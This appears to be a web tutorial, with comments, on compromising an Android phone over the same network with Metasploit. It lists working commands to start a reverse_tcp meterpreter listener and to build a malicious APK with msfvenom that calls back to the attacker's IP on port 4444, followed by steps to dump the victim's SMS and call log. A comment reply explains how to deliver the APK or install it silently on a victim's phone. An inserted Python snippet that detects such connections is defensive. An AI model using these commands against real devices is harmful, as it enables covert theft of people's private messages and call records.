Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is for educational purposes only. We are not responsible for any misuse of this tutorial.

Scenario: The victim uses an Android smartphone. The attacker needs the victim’s call log and SMS messages.

Requirements:

1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering

Steps:

1. Open a terminal and type “sudo msfconsole”.

2. After a few seconds Metasploit will be loaded.

3. Type “use exploit/multi/handler”

4. Type “set PAYLOAD android/meterpreter/reverse_tcp”

5. Type “set LHOST 10.13.37.107” [LHOST=Attacker’s ip over network]

6. Type “exploit”

7. Typing “exploit” creates a listener that waits for an incoming connection.

8. Now let’s make a malicious apk file with Metasploit by typing the following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.13.37.107 LPORT=4444 > virus.apk

9. You can find the virus.apk file in your home folder.

10. Send this virus.apk file to the victim’s phone and convince him to install it. When the victim installs and opens the file, a remote connection is made from the victim’s IP to the attacker’s IP on port 4444. Our Metasploit listener will catch this connection and open a meterpreter session.

11. Type “sysinfo” to check the remote Android system information.

12. Type “dump_sms” to dump all of the victim’s SMS messages.

13. Type “dump_calllog” to dump the call history.

Conclusion: This will work on the same network. Follow us for our next tutorial where we will show you how to use this exploit on a different network.
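A detection-side view of the connection described in step 10, as an added example that is not part of the original tutorial: it scans flow-log lines for sessions between two hosts on the same LAN to TCP port 4444, the LPORT used above. The log format, the subnet, the approved-server list and every address except 10.13.37.107 are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample flow log (format and all addresses except 10.13.37.107 are assumptions).
SAMPLE_LOG = """\
2015-08-30T15:40:02 TCP 10.13.37.52:48211 -> 10.13.37.107:4444 ESTABLISHED
2015-08-30T15:40:05 TCP 10.13.37.52:48990 -> 203.0.113.5:443 ESTABLISHED
2015-08-30T15:41:10 TCP 10.13.37.60:51514 -> 10.13.37.10:445 ESTABLISHED
2015-08-30T15:42:31 TCP 10.13.37.52:48300 -> 10.13.37.107:4444 ESTABLISHED
2015-08-30T15:43:00 TCP 10.13.37.61:40000 -> 10.13.37.10:4444 ESTABLISHED
malformed line
"""

LAN = ipaddress.ip_network("10.13.37.0/24")             # assumed local subnet
WATCHED_PORTS = {4444}                                  # LPORT used in the tutorial
KNOWN_SERVERS = {ipaddress.ip_address("10.13.37.10")}   # assumed approved internal server

LINE_RE = re.compile(
    r"^(?P<ts>\S+) TCP (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+) ESTABLISHED$"
)

def find_reverse_shell_candidates(log_text):
    """Return {(src, dst, port): [timestamps]} for client-to-client LAN sessions
    on a watched port, skipping approved servers and unparsable lines."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the assumed format
        try:
            src = ipaddress.ip_address(m["src"])
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue  # digits and dots that are not a valid address
        port = int(m["dport"])
        if port not in WATCHED_PORTS:
            continue
        if src not in LAN or dst not in LAN:
            continue  # only same-network sessions, as in the tutorial's scenario
        if dst in KNOWN_SERVERS:
            continue  # approved service that legitimately listens on this port
        hits[(str(src), str(dst), port)].append(m["ts"])
    return dict(hits)

if __name__ == "__main__":
    for (src, dst, port), seen in find_reverse_shell_candidates(SAMPLE_LOG).items():
        print(f"ALERT {src} -> {dst}:{port} seen {len(seen)}x, first {seen[0]}")
```

The port is a configurable value, so a match is one signal to investigate, not proof of compromise.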


2 thoughts on “Hack Android Mobile with Metasploit [Same Network]”

    • Hello Samuel,

      You can send the apk file using the following procedure.
      1. Mail it by using Gmail, Yahoo etc.
      2. Upload the file to any file uploading site and then give the downloadable link to the victim.
      3. Keep that apk file in your cloud drive (OneDrive, Google Drive, mega.nz etc.) and if you have physical access to the victim’s Android then you can download the apk and install it silently.

      This is for learning purposes. Hope you understand.
